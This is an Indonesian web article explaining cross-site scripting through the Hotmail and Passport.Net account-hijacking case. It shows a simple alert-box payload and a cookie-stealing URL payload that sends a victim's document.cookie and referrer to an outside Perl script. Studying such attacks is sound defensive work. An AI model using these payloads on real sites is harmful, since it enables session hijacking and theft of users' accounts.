Senin, Oktober 22, 2018
Text Size

Search

Update Berita

SSL to secure from hacker attacks

Open-source software developer Kai Engert has proposed an overhaul to the Internet's SSL...

Cara Menghemat Bandwidth Internet, mempercepat browsing

Ada situasi ketika menggunakan internet kita harus benar-benar hemat dengan penggunaan bandwidth ...

Istana Merespons Aksi 313 Berhentikan Ahok

Juru Bicara Presiden Joko Widodo, Johan Budi Sapto Pribowo menegaskan, Presiden Jokowi sangat...

Twitter Bakal Sediakan Layanan Berbayar?

KOMPAS.com - Setelah selama ini hanya meyediakan layanan gratis yang didukung iklan, Twitter...

Megawati: Ahok, Sudahlah Jangan Cerewet

.   Kompas.com - Megawati menasihati Ahok agar tidak terlalu banyak bicara. Mengingat kondi...

Butuh kеrjа? Cоbа cеk di Jооblе

Butuh kеrjа? Cоbа cеk di Jооblе.       Pаdа zаmаn yаng sаngаt k...

  • Tips mengatasi bosen dalam pekerjaan

    Kamis, 01 November 2012 07:48
  • Grunt Mars probe stranded in Earth orbit

    Kamis, 10 November 2011 09:40
  • SSL to secure from hacker attacks

    Senin, 27 Februari 2012 21:09
  • Cara Menghemat Bandwidth Internet, mempercepat browsing

    Minggu, 23 September 2012 18:03
  • Istana Merespons Aksi 313 Berhentikan Ahok

    Kamis, 30 Maret 2017 19:45
  • Twitter Bakal Sediakan Layanan Berbayar?

    Kamis, 30 Maret 2017 19:49
  • Megawati: Ahok, Sudahlah Jangan Cerewet

    Kamis, 30 Maret 2017 19:54
  • Butuh kеrjа? Cоbа cеk di Jооblе

    Kamis, 30 Maret 2017 20:09
Bencana Cross Site Scripting bagi Hotmail dan Passport.Net
SocialTwist Tell-a-Friend

Bencana Cross Site Scripting bagi Hotmail dan Passport.Net

Penilaian Pengunjung: / 2
KurangTerbaik 

Beberapa bulan yang lalu pembaca mungkin sempat mendengar jika Hotmail dan Passport.Net telah di jebol oleh seorang tokoh hacker dari WhiteHat Security yaitu Jeremiah Grossman. Dan yang luar biasa lagi si Jeremiah Grossman hanya membutuhkan tiga langkah untuk menghijacking beberapa account user Hotmail yang dalam aktifitasnya Hotmail di support oleh Microsoft dengan Passport.Net-nya. Setidaknya kejadian ini telah membuat khawatir dan gusar para pemilik situs di Internet.
Ada yang sedikit menarik untuk di simak bahwa ternyata teknik yang di gunakan oleh Jeremiah Grossman bukanlah teknik yang sulit tapi sangat sederhana, pengin tahu rahasianya? hehehehe…
Di akhir tahun 2002 kemarin sempat santer berita tentang satu bugs di beberapa site sekuriti bahkan beberapa makalah sempat di presentasikan juga untuk membuktikan bahaya dan dampak dari bugs tersebut. Bugs yang di maksud adalah Cross Site Scripting atau di sebut juga dengan nama XSS.
Apa yang di maksud dengan Cross Site Scripting?
Untuk menjelaskan konsep yang di gunakan Cross Site Scripting (XSS) saya akan akan memberikan ilustrasinya dengan link URL berikut ini. Coba Anda perhatikan!
http://site.com/search.cfm?keyword=”><script>alert(“Bugs XSS Found!”);</script>
Ketika Anda menjalankan link di atas di browser Anda, java script yang kita tambahkan di URL akan ikut tereksekusi dan hasilnya Anda akan melihat alert box dengan message “Bugs XSS Found!” tampil di layar monitor Anda.
Dari deskripsi tadi mudah-mudahan pembaca sudah bisa menangkap cara kerja dari bugs Cross Site Scripting ini. Lalu apa yang bisa kita kembangkan dari bugs tersebut? Untuk mengembangkan XSS ke dalam expert concept Anda perlu memahami mekanisme kerja dari web beserta mode autentifikasi yang di gunakan.
Tapi bagaimana dengan kasus yang Hotmail?
Untuk menjelaskan kasus yang terjadi di Hotmail penulis akan menjelaskan terlebih dahulu fungsi dan kerja dari cookies dalam sebuah website. Cookies biasanya di gunakan untuk menyimpan beberapa informasi site dan user account seperti mail account atau web login. Ketika seseorang melakukan login ke email account atau web login, browser akan menyimpan informasi site yang di akses beserta loginnya ke dalam cookies, tentu dengan mode enkripsi agar tidak di ketahui orang.
Cookies juga bisa berbahaya misal ketika Anda login ke email Anda dan ketika selesai Anda tidak menekan link Sign Out maka bisa di pastikan orang yang menggunakan kompi Anda, jika dia membuka site yang sama, dia akan langsung masuk ke mail box Anda tanpa perlu login dan password. Ingin bukti? Sekarang coba Anda login ke email yahoo Anda, kemudian setelah masuk di mail box tutup (close) browser Anda tanpa menekan Sign Out. Selanjutnya buka browser Anda kembali dan buka mail yahoo Anda lagi, maka Anda akan langsung masuk ke mail box Anda tanpa perlu login dan password.
Jadi kesimpulannya ketika Anda melakukan login, browser akan membuatkan cookies sesuai dengan kebutuhan site yang Anda akses untuk di compare dengan cookies yang ada di site yang Anda akses (autentifikasi session) dan ketika Anda Sign Out maka cookies yang di simpan akan di hapus kembali oleh browser.
Sedikit berbeda dengan kasus di Hotmail, teknik yang di gunakan agak sedikit unik yaitu dengan memanfaatkan Cross Site Scripting untuk mengambil cookies dan dokumen referrer di server target (hijacking) dan kemudian menyimpan informasi tersebut di kompi kita, akibatnya tentu bisa Anda tebak, kita jadi memiliki akses terhadap account yang di hijacking cookiesnya. Coba Anda perhatikan link URL berikut!
http://xxxxxxxxx.msn.com/news/article.asp?art=><scr!pt>window.open('http://host/cgi-bin/rompigema.pl?'+document.referrer+'%20'+document.cookie);</scr!pt>
Anda perhatikan link di atas, dokumen referrer dan dokumen cookies di ambil dan di proses dalam sebuah perl code untuk di olah dan kemudian perl code (rompigema.pl) akan melakukan request ke MSN untuk mendapatkan informasi dari user seperti list mail box dan sebagainya.
Okeh, saya yakin logika Anda sudah mulai mendapatkan pencerahan dari beberapa penjelasan yang saya berikan di atas. Tidak ada yang aneh dalam sekuriti jaringan karena semua masih berpatokan pada logika pemrogramman. Sekecil apa pun bugs yang ada di site Anda, dampaknya bisa menjadi besar ketika Anda tidak mengetahuinya

Comments
Add New Search
Write comment
Name:
Email:
 
Website:
Title:
 
:angry::0:confused::cheer:B):evil::silly::dry::lol::kiss::D:pinch:
:(:shock::X:side::):P:unsure::woohoo::huh::whistle:;):s
:!::?::idea::arrow:
 
Please input the anti-spam code that you can read in the image.

3.25 Copyright (C) 2007 Alain Georgette / Copyright (C) 2006 Frantisek Hliva. All rights reserved."

Advertisement Site




Ads - World Friend

Ads - World Friend

Berita lain-lainnya

Sulitnya blokir situs porno di Indonesia
01/11/2012 | Indra Febria Widy
article thumbnail

Pemerintah dalam hal ini Kementerian Komunikasi dan Informatika (Kominfo) mengaku mengalami kesulitan melakukan blokir situs-situs negatif yang "mengakar" di jagat maya.

Direktur Jenderal Aplikasi I [ ... ]


Israel kembali serang jalur gaza
05/01/2011 | Indra Febria Widy
article thumbnail

Pesawat-pesawat perang Israel telah menyerang dua sasaran di Jalur Gaza yang dikuasai Hamas pada Selasa tanpa menimbulkan korban.

Sasaran itu adalah sebuah terowongan yang menghubungkan Gaza dengan M [ ... ]